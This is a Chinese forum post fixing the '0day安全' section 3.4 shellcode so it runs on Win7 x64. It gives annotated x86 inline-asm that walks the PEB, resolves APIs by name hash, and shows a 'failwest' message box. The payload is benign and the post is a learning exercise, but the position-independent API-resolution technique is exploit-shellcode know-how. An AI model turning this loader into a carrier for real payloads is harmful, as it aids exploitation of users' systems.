[原创]关于0day安全3.4节在win7下面无法运行的解决方法
发表于: 2022-8-25 00:04 9028



偶然发现该案例的 shellcode 在 Win10 下可以正常运行，但在 Win7 x64 下无法运行。经过对比发现：Win10 下 kernelbase.dll 中有 LoadLibraryA 函数，而 Win7 x64 下 kernelbase.dll 中是 LoadLibraryExA（而不是 LoadLibraryA）。因此对代码做了两处修改：一是函数名 hash 的修改（改为 LoadLibraryExA 的 hash），二是识别到该函数之后对调用参数的修改（LoadLibraryExA 比 LoadLibraryA 多两个参数，需额外压入两个 0）。具体可对比源码或调试。

int main()
{
    /*
     * Hash-based API resolution demo ("0day安全" §3.4), adjusted by the post
     * so that it also runs on Win7 x64.  This is 32-bit x86 MSVC inline asm
     * (Intel syntax); on a 64-bit OS it runs as a 32-bit process.
     *
     * Flow:
     *   1. push three function-name hashes (MessageBoxA, ExitProcess,
     *      LoadLibraryExA); the resolved addresses are written into the
     *      three dwords just below them.
     *   2. pre-push the arguments of LoadLibraryExA("user32", NULL, 0).
     *   3. locate the second module in the loader's initialisation-order list
     *      (kernelbase.dll on Win7/Win10 according to the post) and resolve
     *      each hash by walking that module's export table.
     *   4. MessageBoxA(NULL, "failwest", "failwest", 0); ExitProcess(0).
     *
     * Changes vs. the original listing (per the post): the LoadLibraryA hash
     * became the LoadLibraryExA hash, and two zero arguments (hFile, dwFlags)
     * are pushed before the "user32" pointer.  The post's finding is that
     * Win7 x64's kernelbase.dll exposes LoadLibraryExA rather than
     * LoadLibraryA, so the old hash never matched there.
     *
     * Register roles after setup (see labels below):
     *   esi = next hash to resolve      (lodsd walks upward)
     *   edi = next slot for an address  (stosd walks upward)
     *   ebp = base of the module currently being searched
     */
_asm{
        nop                      ; nop padding, kept from the original listing
        nop
 
 
 
        nop
        nop
        nop
        CLD                      ; clear DF so lodsd/stosd below walk upward
        ; store hashes; lodsd later reads them lowest-address-first, i.e. in
        ; the order LoadLibraryExA, ExitProcess, MessageBoxA
        push 0x1e380a6a        ;hash of MessageBoxA
        push 0x4fd18963        ;hash of ExitProcess
        push 0xc0d83287        ;hash of LoadLibraryExA (was LoadLibraryA in the original listing)
        mov esi,esp            ; esi = addr of first function hash
        lea edi,[esi-0xc]    ; edi = addr to start writing function addrs
                             ; slots: [esi-0xc]=LoadLibraryExA, [esi-8]=ExitProcess, [esi-4]=MessageBoxA
 
 
 
        ; make some stack space: ebx = 0x400 (built via bh, presumably to keep
        ; a 0x00 byte out of the immediate); esp -= 0x400 so the three address
        ; slots above stay clear of the pushes and calls that follow
        xor ebx,ebx
        mov bh, 0x04             
        sub esp, ebx
 
 
 
 
        ; push a pointer to "user32" onto stack, then the remaining
        ; LoadLibraryExA(lpLibFileName, hFile, dwFlags) arguments
        mov bx, 0x3233         ; bx = "32"; this also overwrites bh=0x04, so ebx = "32\0\0"
        push ebx
        push 0x72657375        ; "user" -> stack now holds "user32\0\0"
        xor edx,edx
        push edx               ; dwFlags = 0
        push edx               ; hFile   = NULL
        lea edx,[esp+8]        ; edx = &"user32"
        push edx               ; lpLibFileName
 
        xor edx,edx            ; edx = 0 for the fs:[edx + 0x30] load below
 
 
    ; find base addr of the second module in the loader's initialisation
    ; order list (called kernel32.dll in the original comment; the post
    ; identifies it as kernelbase.dll on Win7/Win10, hence the hash change)
        mov ebx, fs:[edx + 0x30]     ; ebx = address of PEB
        mov ecx, [ebx + 0x0c]         ; ecx = pointer to loader data
        mov ecx, [ecx + 0x1c]         ; ecx = first entry in initialisation order list
        mov ecx, [ecx]                 ; ecx = second entry in list
        mov ebp, [ecx + 0x08]         ; ebp = base address of that module
 
 
    find_lib_functions:
        ; resolve each hash in turn; when the MessageBoxA hash comes up, first
        ; load user32.dll (its arguments were pre-pushed above) and point ebp at
        ; the user32 base before resolving
        lodsd                     ; load next hash into eax and increment esi
        cmp eax, 0x1e380a6a        ; hash of MessageBoxA - trigger
                                ; LoadLibraryExA("user32", NULL, 0)
        jne find_functions
        xchg eax, ebp             ; save current hash in ebp (callee-saved, survives the call)
        call [edi - 0x8]         ; LoadLibraryExA: first resolved slot; edi has
                                 ; already advanced past two slots at this point
        xchg eax, ebp             ; restore current hash, and update ebp
                                ; with base address of user32.dll
 
 
    find_functions:
        ; resolve the hash in eax against the export table of the module at
        ; ebp; writes the address to [edi] and advances edi by 4; every other
        ; register is restored by popad
        pushad                         ; preserve registers
        mov eax, [ebp + 0x3c]        ; eax = e_lfanew = start of PE header
        mov ecx, [ebp + eax + 0x78]    ; ecx = relative offset of export table
        add ecx, ebp                 ; ecx = absolute addr of export table
        mov ebx, [ecx + 0x20]         ; ebx = relative offset of names table
        add ebx, ebp                 ; ebx = absolute addr of names table
        xor edi, edi                 ; edi will count through the functions
 
    next_function_loop:
        inc edi                     ; increment function counter (pre-increment:
                                    ; name index 0 is never examined)
        mov esi, [ebx + edi * 4]     ; esi = relative offset of current function name
        add esi, ebp                 ; esi = absolute addr of current function name
        cdq                         ; edx = 0: eax is the small e_lfanew on the first
                                    ; pass and the 0 terminator byte on later passes
 
    hash_loop:
        movsx eax, byte ptr[esi]    ; eax = next name byte, sign-extended
        cmp al,ah                   ; ah is the sign byte: equals al for the 0 terminator
                                    ; (also for 0xFF, which is not expected in export names)
        jz compare_hash
        ror edx,7                   ; hash = ror(hash, 7) + byte
        add edx,eax
        inc esi
        jmp hash_loop
 
    compare_hash:   
        cmp edx, [esp + 0x1c]         ; compare to the requested hash (eax saved on stack by pushad)
        jnz next_function_loop
 
 
        ; match: name index (edi) -> ordinal -> address
        mov ebx, [ecx + 0x24]         ; ebx = relative offset of ordinals table
        add ebx, ebp                 ; ebx = absolute addr of ordinals table
        mov di, [ebx + 2 * edi]     ; di = ordinal number of matched function
                                    ; (16-bit write; upper half of edi is still 0 from the counter)
        mov ebx, [ecx + 0x1c]         ; ebx = relative offset of address table
        add ebx, ebp                 ; ebx = absolute addr of address table
        add ebp, [ebx + 4 * edi]     ; add to ebp (base addr of module) the
                                    ; relative offset of matched function
        xchg eax, ebp                 ; move func addr into eax
        pop edi                     ; edi is last onto stack in pushad
        stosd                         ; write function addr to [edi] and increment edi
        push edi                    ; so popad restores the advanced edi
        popad                    ; restore registers (eax = current hash again)
                                 ; loop until we reach end of last hash
        cmp eax,0x1e380a6a       ; MessageBoxA is the last hash to be resolved
        jne find_lib_functions
 
    function_call:
        ; MessageBoxA(NULL, "failwest", "failwest", 0); ExitProcess(0)
        xor ebx,ebx
        push ebx            // string terminator
        push 0x74736577     // "west"
        push 0x6C696166        //push failwest -> "failwest\0" on stack
        mov eax,esp            //load address of failwest
        push ebx               // uType = 0
        push eax               // lpCaption
        push eax               // lpText
        push ebx               // hWnd = NULL
        call [edi - 0x04] ; //call MessageboxA (third resolved slot)
        push ebx               // uExitCode = 0
        call [edi - 0x08] ; // call ExitProcess (second resolved slot); does not return
        nop
        nop
        nop
        nop
}
}
